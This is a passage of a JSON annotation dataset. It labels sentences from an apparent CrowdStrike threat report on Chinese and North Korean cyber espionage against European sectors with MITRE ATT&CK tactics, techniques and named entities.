183, "end": 192, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p32-s230-575d47", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 32, "sentence_id": 230, "context_before": "Likely Phishing Campaign Targets Western Europe Starting in at least December 2024 through July 2025, HAYWIRE KITTEN likely conducted an extensive Microsoft- themed phishing campaign targeting Western organizations across various sectors.", "sentence_text": "The group deployed Microsoft-themed credential harvesting pages and likely used spear-phishing emails with a PDF attachment lure containing a request for quote (RFQ) for an event space in Germany that hosts various trade shows and conferences.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1586.002", "name": "Email Accounts" } ], "procedure": "deployed credential harvesting pages and spear-phishing emails", "entities": [ { "text": "credential harvesting", "start": 36, "end": 57, "label": "Action" }, { "text": "spear-phishing ", "start": 80, "end": 95, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p32-s231-7d0cdf", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 32, "sentence_id": 231, "context_before": "The group deployed Microsoft-themed credential harvesting pages and likely used spear-phishing emails with a PDF attachment lure containing a request for quote (RFQ) for an event space in Germany that hosts various trade shows and conferences.", "sentence_text": "The adversary likely conducted this activity to collect intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p32-s232-9d4ded", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 32, "sentence_id": 232, "context_before": "The adversary likely conducted this activity to collect intelligence.", "sentence_text": "HAYWIRE KITTEN developed infrastructure domains to target Western entities.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Acquire Infrastructure: Domains" } ], "procedure": "Develop infrastructure domains to target Western entities.", "entities": [ { "text": "HAYWIRE KITTEN", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "developed infrastructure domains", "start": 15, "end": 47, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p33-s233-76ca66", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 33, "sentence_id": 233, "context_before": "HAYWIRE KITTEN developed infrastructure domains to target Western entities.", "sentence_text": "CHINA-NEXUS ACTIVITY\nThe EU — one of China’s largest trading partners and investment destinations — plays a key role in China’s aspirations to improve regional integration via trade in Central Asia and Eastern Europe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p33-s234-d748dc", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 33, "sentence_id": 234, "context_before": "CHINA-NEXUS ACTIVITY\nThe EU — one of China’s largest trading partners and investment destinations — plays a key role in China’s aspirations to improve regional integration via trade in Central Asia and Eastern Europe.", "sentence_text": "China’s cyber activity targeting Europe has remained consistently focused on likely intelligence collection to inform Beijing’s political and economic engagement with the region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p33-s235-4f0038", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 33, "sentence_id": 235, "context_before": "China’s cyber activity targeting Europe has remained consistently focused on likely intelligence collection to inform Beijing’s political and economic engagement with the region.", "sentence_text": "Beijing also aims to support the government’s strategic priorities amid a currently turbulent period in the EU-U.S. relationship regarding trade and defense issues.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p33-s236-1b3eb1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 33, "sentence_id": 236, "context_before": "Beijing also aims to support the government’s strategic priorities amid a currently turbulent period in the EU-U.S. relationship regarding trade and defense issues.", "sentence_text": "China-nexus threat actors’ operations targeting Europe likely aim to support China’s strategic priorities, such as boosting the economy and avoiding foreign interference.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "China-nexus threat actors conduct operations targeting Europe.", "entities": [ { "text": "China-nexus threat actors", "start": 0, "end": 25, "label": "ThreatActor" }, { "text": "targeting Europe", "start": 38, "end": 54, "label": "Action" }, { "text": "Europe", "start": 48, "end": 54, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p33-s237-199ed8", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 33, "sentence_id": 237, "context_before": "China-nexus threat actors’ operations targeting Europe likely aim to support China’s strategic priorities, such as boosting the economy and avoiding foreign interference.", "sentence_text": "China also aims to achieve self-reliance in key science and technology areas, particularly as the country’s access to advanced technologies made outside of China is increasingly restricted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p34-s238-192749", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 34, "sentence_id": 238, "context_before": "China also aims to achieve self-reliance in key science and technology areas, particularly as the country’s access to advanced technologies made outside of China is increasingly restricted.", "sentence_text": "European Healthcare and Biotechnology Sector Targeting Multiple China-nexus adversaries continue to persistently target the healthcare and biotechnology sector, which is one of the most consistently targeted sectors in Europe.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Persistently target the European healthcare and biotechnology sector.", "entities": [ { "text": "China-nexus adversaries", "start": 64, "end": 87, "label": "ThreatActor" }, { "text": "persistently target the healthcare and biotechnology sector", "start": 100, "end": 159, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p34-s239-33afba", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 34, "sentence_id": 239, "context_before": "European Healthcare and Biotechnology Sector Targeting Multiple China-nexus adversaries continue to persistently target the healthcare and biotechnology sector, which is one of the most consistently targeted sectors in Europe.", "sentence_text": "MUSTANG PANDA’s operations impacted several European healthcare organizations throughout 2023 and 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p34-s240-cbbd33", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 34, "sentence_id": 240, "context_before": "MUSTANG PANDA’s operations impacted several European healthcare organizations throughout 2023 and 2024.", "sentence_text": "The adversary’s capabilities have continued to evolve, and they most recently deployed LubanBall at a Netherlands-based healthcare organization in August 2024.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "deployed LubanBall", "entities": [ { "text": " deployed", "start": 77, "end": 86, "label": "Action" }, { "text": " adversary", "start": 3, "end": 13, "label": "ThreatActor" }, { "text": "LubanBall ", "start": 87, "end": 97, "label": "MalwareTool" }, { "text": " Netherlands-based healthcare organization", "start": 101, "end": 143, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p34-s241-8fd4ff", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 34, "sentence_id": 241, "context_before": "The adversary’s capabilities have continued to evolve, and they most recently deployed LubanBall at a Netherlands-based healthcare organization in August 2024.", "sentence_text": "This targeting pattern aligns with China's strategic interest in advancing its biotechnology capabilities and understanding Western medical innovations that are critical to national health security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p34-s242-49c410", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 34, "sentence_id": 242, "context_before": "This targeting pattern aligns with China's strategic interest in advancing its biotechnology capabilities and understanding Western medical innovations that are critical to national health security.", "sentence_text": "European Government and Defense Sector Targeting During the reporting period, VIXEN PANDA has been the most prolific threat to government and defense entities in Europe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p34-s243-2d1d3e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 34, "sentence_id": 243, "context_before": "European Government and Defense Sector Targeting During the reporting period, VIXEN PANDA has been the most prolific threat to government and defense entities in Europe.", "sentence_text": "From early 2024 through early 2025, VIXEN PANDA engaged in systematic scanning operations using an operational relay box (ORB) network tracked as ORB02, demonstrating the adversary’s operational persistence and scope.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595", "name": "Active Scanning" } ], "procedure": "systematic scanning operations using ORB network", "entities": [ { "text": "VIXEN PANDA ", "start": 36, "end": 48, "label": "ThreatActor" }, { "text": " scanning", "start": 69, "end": 78, "label": "Action" }, { "text": "adversary", "start": 171, "end": 180, "label": "ThreatActor" }, { "text": " operational relay box (ORB) network ", "start": 98, "end": 135, "label": "Infrastructure_Indicator" }, { "text": " ORB02", "start": 145, "end": 151, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p34-s244-b64fd0", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 34, "sentence_id": 244, "context_before": "From early 2024 through early 2025, VIXEN PANDA engaged in systematic scanning operations using an operational relay box (ORB) network tracked as ORB02, demonstrating the adversary’s operational persistence and scope.", "sentence_text": "VIXEN PANDA's activities in the latter half of 2024 progressed from broad reconnaissance efforts against hundreds of network security devices across multiple European countries to targeted attempts to exploit perimeter appliances at government and defense entities in Slovenia, Romania, the Czech Republic, and EU institutions.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit perimeter appliances at government entities", "entities": [ { "text": "VIXEN PANDA", "start": 0, "end": 11, "label": "ThreatActor" }, { "text": "reconnaissance ", "start": 74, "end": 89, "label": "Action" }, { "text": " exploit", "start": 200, "end": 208, "label": "Action" }, { "text": " network security devices", "start": 116, "end": 141, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p34-s245-86e117", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 34, "sentence_id": 245, "context_before": "VIXEN PANDA's activities in the latter half of 2024 progressed from broad reconnaissance efforts against hundreds of network security devices across multiple European countries to targeted attempts to exploit perimeter appliances at government and defense entities in Slovenia, Romania, the Czech Republic, and EU institutions.", "sentence_text": "VIXEN PANDA’s February 2025 targeting of a U.S. government agency's European operations indicates the adversary is maintaining their operational tempo and focusing on high-value government and defense targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p34-s246-d54de8", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 34, "sentence_id": 246, "context_before": "VIXEN PANDA’s February 2025 targeting of a U.S. government agency's European operations indicates the adversary is maintaining their operational tempo and focusing on high-value government and defense targets.", "sentence_text": "Between September 2024 and March 2025, observations in third-party network telemetry data indicate TREASURE PANDA likely targeted Russian aerospace and defense entities developing military radar systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p34-s247-e86638", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 34, "sentence_id": 247, "context_before": "Between September 2024 and March 2025, observations in third-party network telemetry data indicate TREASURE PANDA likely targeted Russian aerospace and defense entities developing military radar systems.", "sentence_text": "The adversary’s broad target scope has extended into Eastern Europe, likely due to Russia’s invasion of Ukraine in 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s248-a31ce1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 248, "context_before": "The adversary’s broad target scope has extended into Eastern Europe, likely due to Russia’s invasion of Ukraine in 2022.", "sentence_text": "This activity occurred shortly after Italy formally withdrew from China's Belt and Road Initiative in December 2023, suggesting the threat actor potentially had retaliatory or intelligence-gathering motivations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s249-4b4af1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 249, "context_before": "This activity occurred shortly after Italy formally withdrew from China's Belt and Road Initiative in December 2023, suggesting the threat actor potentially had retaliatory or intelligence-gathering motivations.", "sentence_text": "China-nexus threat actors’ targeting of multiple EU institutions and NATO-aligned countries likely reflects Beijing’s priority to monitor European defense coordination and policy development.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s250-625565", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 250, "context_before": "China-nexus threat actors’ targeting of multiple EU institutions and NATO-aligned countries likely reflects Beijing’s priority to monitor European defense coordination and policy development.", "sentence_text": "China-nexus adversaries also continue to target European countries that are not aligned with Western politics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s251-1cfc2c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 251, "context_before": "China-nexus adversaries also continue to target European countries that are not aligned with Western politics.", "sentence_text": "These adversaries have targeted Russian entities — which aligns with the geographic mission of the People’s Liberation Army (PLA) Northern Theater Command units — likely to collect intelligence regarding national security and defense.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s252-5dacfa", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 252, "context_before": "These adversaries have targeted Russian entities — which aligns with the geographic mission of the People’s Liberation Army (PLA) Northern Theater Command units — likely to collect intelligence regarding national security and defense.", "sentence_text": "European Manufacturing Sector Targeting VERTIGO PANDA has targeted the European manufacturing sector with USB-based exploitation techniques.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1091", "name": "Replication Through Removable Media" } ], "procedure": "VERTIGO PANDA targeted the European manufacturing sector using USB-based exploitation techniques.", "entities": [ { "text": "VERTIGO PANDA", "start": 40, "end": 53, "label": "ThreatActor" }, { "text": "USB-based exploitation techniques", "start": 106, "end": 139, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s253-a5202e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 253, "context_before": "European Manufacturing Sector Targeting VERTIGO PANDA has targeted the European manufacturing sector with USB-based exploitation techniques.", "sentence_text": "Given the persistent nature of malware delivery via removable media, CrowdStrike Intelligence cannot determine whether these samples represent ongoing novel VERTIGO PANDA attempts to deploy InstituteX or continuing reinfections.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T0847", "name": "" } ], "procedure": "malware delivery via removable media", "entities": [ { "text": "VERTIGO PANDA ", "start": 157, "end": 171, "label": "ThreatActor" }, { "text": "deploy", "start": 183, "end": 189, "label": "Action" }, { "text": "InstituteX", "start": 190, "end": 200, "label": "MalwareTool" }, { "text": "malware delivery", "start": 31, "end": 47, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s254-758ecb", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 254, "context_before": "Given the persistent nature of malware delivery via removable media, CrowdStrike Intelligence cannot determine whether these samples represent ongoing novel VERTIGO PANDA attempts to deploy InstituteX or continuing reinfections.", "sentence_text": "European Financial Services Sector Targeting Financial services entities face targeted intelligence collection efforts from China-nexus adversaries, with VAULT PANDA conducting reconnaissance against Swiss financial institutions in January 2024.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "VAULT PANDA conducted reconnaissance against Swiss financial institutions.", "entities": [ { "text": "VAULT PANDA", "start": 154, "end": 165, "label": "ThreatActor" }, { "text": "conducting reconnaissance against Swiss financial institutions", "start": 166, "end": 228, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s255-3b6936", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 255, "context_before": "European Financial Services Sector Targeting Financial services entities face targeted intelligence collection efforts from China-nexus adversaries, with VAULT PANDA conducting reconnaissance against Swiss financial institutions in January 2024.", "sentence_text": "The adversary used Acunetix for initial reconnaissance to identify exploitable vulnerabilities.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595.002", "name": "Vulnerability Scanning" } ], "procedure": "used Acunetix for reconnaissance to identify vulnerabilities", "entities": [ { "text": "reconnaissance", "start": 40, "end": 54, "label": "Action" }, { "text": " exploit", "start": 66, "end": 74, "label": "Action" }, { "text": "adversary ", "start": 4, "end": 14, "label": "ThreatActor" }, { "text": " Acunetix", "start": 18, "end": 27, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s256-7e96c9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 256, "context_before": "The adversary used Acunetix for initial reconnaissance to identify exploitable vulnerabilities.", "sentence_text": "In August 2024, WICKED PANDA conducted a large-scale phishing campaign targeting insurance entities across multiple European countries, including the U.K., France, Italy, and Germany.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "conducted large-scale phishing campaign", "entities": [ { "text": "WICKED PANDA", "start": 16, "end": 28, "label": "ThreatActor" }, { "text": " phishing ", "start": 52, "end": 62, "label": "Action" }, { "text": "targeting", "start": 71, "end": 80, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s257-4158f2", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 257, "context_before": "In August 2024, WICKED PANDA conducted a large-scale phishing campaign targeting insurance entities across multiple European countries, including the U.K., France, Italy, and Germany.", "sentence_text": "The adversary used compromised tax authority emails to deliver the Voldemort malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "used compromised emails to deliver malware", "entities": [ { "text": " adversary ", "start": 3, "end": 14, "label": "ThreatActor" }, { "text": " deliver", "start": 54, "end": 62, "label": "Action" }, { "text": " Voldemort malware", "start": 66, "end": 84, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s258-445c8e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 258, "context_before": "The adversary used compromised tax authority emails to deliver the Voldemort malware.", "sentence_text": "China-nexus adversaries appear to target financial institutions to collect intelligence and steal PII.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1213", "name": "Data from Information Repositories" } ], "procedure": "target financial institutions to collect intelligence and steal PII", "entities": [ { "text": "China-nexus adversaries", "start": 0, "end": 23, "label": "ThreatActor" }, { "text": "target financial institutions", "start": 34, "end": 63, "label": "Action" }, { "text": "collect intelligence", "start": 67, "end": 87, "label": "Action" }, { "text": "steal PII", "start": 92, "end": 101, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s259-8942d6", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 259, "context_before": "China-nexus adversaries appear to target financial institutions to collect intelligence and steal PII.", "sentence_text": "The collected data is likely useful for assessing monetary assets and facilitating follow-on intelligence activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p35-s260-2b455f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 35, "sentence_id": 260, "context_before": "The collected data is likely useful for assessing monetary assets and facilitating follow-on intelligence activities.", "sentence_text": "This suggests China's interest in understanding European financial capabilities and potentially identifying targets for future economic espionage operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p36-s261-e0b093", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 36, "sentence_id": 261, "context_before": "This suggests China's interest in understanding European financial capabilities and potentially identifying targets for future economic espionage operations.", "sentence_text": "European Academic Sector Targeting Academic institutions and research organizations face systematic targeting as part of broader multi-sector campaigns, with VIXEN PANDA conducting reconnaissance against academic entities and EU research institutions in April 2024.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "VIXEN PANDA conducted reconnaissance against academic entities and EU research institutions.", "entities": [ { "text": "VIXEN PANDA", "start": 158, "end": 169, "label": "ThreatActor" }, { "text": "conducting reconnaissance against academic entities and EU research institutions", "start": 170, "end": 250, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p36-s262-ae49e9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 36, "sentence_id": 262, "context_before": "European Academic Sector Targeting Academic institutions and research organizations face systematic targeting as part of broader multi-sector campaigns, with VIXEN PANDA conducting reconnaissance against academic entities and EU research institutions in April 2024.", "sentence_text": "WICKED PANDA also targeted European academic institutions in an August 2024 phishing campaign that impacted more than 70 global targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p36-s263-f5f59f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 36, "sentence_id": 263, "context_before": "WICKED PANDA also targeted European academic institutions in an August 2024 phishing campaign that impacted more than 70 global targets.", "sentence_text": "Targeting EU research institutions alongside government and military entities suggests China recognizes academia’s critical role in European technological advancement and defense capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p36-s264-c759f9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 36, "sentence_id": 264, "context_before": "Targeting EU research institutions alongside government and military entities suggests China recognizes academia’s critical role in European technological advancement and defense capabilities.", "sentence_text": "European Technology Sector Targeting In June 2025 and July 2025, CrowdStrike OverWatch and CrowdStrike Services responded to GENESIS PANDA’s intrusion activity at a Spain-based technology firm.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p36-s265-e8a3e0", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 36, "sentence_id": 265, "context_before": "European Technology Sector Targeting In June 2025 and July 2025, CrowdStrike OverWatch and CrowdStrike Services responded to GENESIS PANDA’s intrusion activity at a Spain-based technology firm.", "sentence_text": "The adversary likely gained initial access by compromising a basic reconnaissance activity, attempted to move laterally via Windows Remote Shell, and downloaded multiple implants and tools — including Sliver and Cobalt Strike — from known adversary-controlled infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Gain initial access, move laterally via Windows Remote Shell, and download implants (Sliver, Cobalt Strike) from adversary-controlled infrastructure.", "entities": [ { "text": "The adversary", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "gained initial access by compromising a basic reconnaissance activity, attempted to move laterally via Windows Remote Shell, and downloaded multiple implants and tools — including Sliver and Cobalt Strike — from known adversary-controlled infrastructure", "start": 21, "end": 274, "label": "Action" }, { "text": "Sliver", "start": 201, "end": 207, "label": "MalwareTool" }, { "text": "Cobalt Strike", "start": 212, "end": 225, "label": "MalwareTool" }, { "text": "known adversary-controlled infrastructure", "start": 233, "end": 274, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p36-s266-7d474b", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 36, "sentence_id": 266, "context_before": "The adversary likely gained initial access by compromising a basic reconnaissance activity, attempted to move laterally via Windows Remote Shell, and downloaded multiple implants and tools — including Sliver and Cobalt Strike — from known adversary-controlled infrastructure.", "sentence_text": "Technology organizations are routinely targeted to fulfill adversaries’ traditional intelligence collection and industrial espionage requirements, highlighting that cyber espionage is integral to China’s national information-gathering efforts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p36-s267-c52a0a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 36, "sentence_id": 267, "context_before": "Technology organizations are routinely targeted to fulfill adversaries’ traditional intelligence collection and industrial espionage requirements, highlighting that cyber espionage is integral to China’s national information-gathering efforts.", "sentence_text": "Given that China-nexus adversaries have historically significantly targeted technology entities worldwide, the European technology sector is likely a high-priority target for them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p36-s268-a3179c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 36, "sentence_id": 268, "context_before": "Given that China-nexus adversaries have historically significantly targeted technology entities worldwide, the European technology sector is likely a high-priority target for them.", "sentence_text": "European Nonprofit and NGO Sector Targeting In June 2024, CASCADE PANDA successfully deployed WinDealer malware at a Western European nonprofit's China-based offices.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "CASCADE PANDA deployed WinDealer malware at a Western European nonprofit's China-based offices.", "entities": [ { "text": "CASCADE PANDA", "start": 58, "end": 71, "label": "ThreatActor" }, { "text": "WinDealer", "start": 94, "end": 103, "label": "MalwareTool" }, { "text": "successfully deployed WinDealer malware", "start": 72, "end": 111, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p36-s269-4eb77a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 36, "sentence_id": 269, "context_before": "European Nonprofit and NGO Sector Targeting In June 2024, CASCADE PANDA successfully deployed WinDealer malware at a Western European nonprofit's China-based offices.", "sentence_text": "This targeting demonstrated China's interest in monitoring international NGOs operating in Chinese territory and suggests potential concerns regarding foreign influence operations or intelligence collection activities conducted through nonprofit organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p37-s270-894070", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 37, "sentence_id": 270, "context_before": "This targeting demonstrated China's interest in monitoring international NGOs operating in Chinese territory and suggests potential concerns regarding foreign influence operations or intelligence collection activities conducted through nonprofit organizations.", "sentence_text": "This targeting aligns with North Korea’s priorities of obtaining nuclear weapons and advanced military technology and gaining regional influence in Northeast Asia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p37-s271-6fb7ee", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 37, "sentence_id": 271, "context_before": "This targeting aligns with North Korea’s priorities of obtaining nuclear weapons and advanced military technology and gaining regional influence in Northeast Asia.", "sentence_text": "European Defense Sector Targeting Since at least April 2024, DPRK-nexus adversaries VELVET CHOLLIMA and LABYRINTH CHOLLIMA have targeted European defense entities to possibly steal intellectual property and/or fulfill military intelligence requirements.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p37-s272-88ef99", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 37, "sentence_id": 272, "context_before": "European Defense Sector Targeting Since at least April 2024, DPRK-nexus adversaries VELVET CHOLLIMA and LABYRINTH CHOLLIMA have targeted European defense entities to possibly steal intellectual property and/or fulfill military intelligence requirements.", "sentence_text": "This activity likely supports North Korea’s military technology and allows the country to obtain tactical intelligence on European weapons systems, which Ukrainian forces may use against DPRK soldiers fighting in alliance with Russia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p37-s273-551682", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 37, "sentence_id": 273, "context_before": "This activity likely supports North Korea’s military technology and allows the country to obtain tactical intelligence on European weapons systems, which Ukrainian forces may use against DPRK soldiers fighting in alliance with Russia.", "sentence_text": "Additionally, several European countries contribute forces and material to the UN Command stationed in the Republic of Korea (ROK).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p37-s274-ef50ce", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 37, "sentence_id": 274, "context_before": "Additionally, several European countries contribute forces and material to the UN Command stationed in the Republic of Korea (ROK).", "sentence_text": "The UN Command is a multi-lateral body formed in 1950 to counter the DPRK’s aggression against the ROK during the Korean War.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s275-c7b975", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 275, "context_before": "The UN Command is a multi-lateral body formed in 1950 to counter the DPRK’s aggression against the ROK during the Korean War.", "sentence_text": "Between May 2024 and at least September 2024, VELVET CHOLLIMA likely targeted a German defense manufacturer’s employees via a credential phishing campaign deploying their HTTPSpy malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Target employees via a credential phishing campaign to deploy 